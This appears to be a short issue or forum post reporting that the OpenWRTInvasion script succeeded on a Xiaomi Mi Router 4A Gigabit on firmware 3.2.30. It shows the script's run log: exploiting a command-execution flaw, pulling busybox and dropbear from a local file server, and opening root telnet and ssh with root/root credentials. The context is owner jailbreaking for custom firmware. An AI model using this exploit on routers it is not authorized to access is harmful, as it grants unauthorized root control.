[Success] Mi Router 4A Gigabit Edition (R4A) on firmware 3.2.30

[symm]

Reporting success with the following methods:

• The original 0.0.1 offline which got me a shell
• Current master branch in MacOS (Ventura):

➜ OpenWRTInvasion git:(master) python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: {redacted}
There two options to provide the files needed for invasion:

1. Use a local TCP file server runing on random port to provide files in local directory script_tools.
2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
   Which option do you prefer? (default: 1)

---

router_ip_address: 192.168.31.1
stok: {redacted}
file provider: local file server

---

start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:49471. root='script_tools'
local file server is getting 'busybox-mipsel' for 192.168.31.1.
local file server is getting 'dropbearStaticMipsel.tar.bz2' for 192.168.31.1.
done! Now you can connect to the router using several options: (user: root, password: root)

• telnet 192.168.31.1
• ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null [email protected]
• ftp: using a program like cyberduck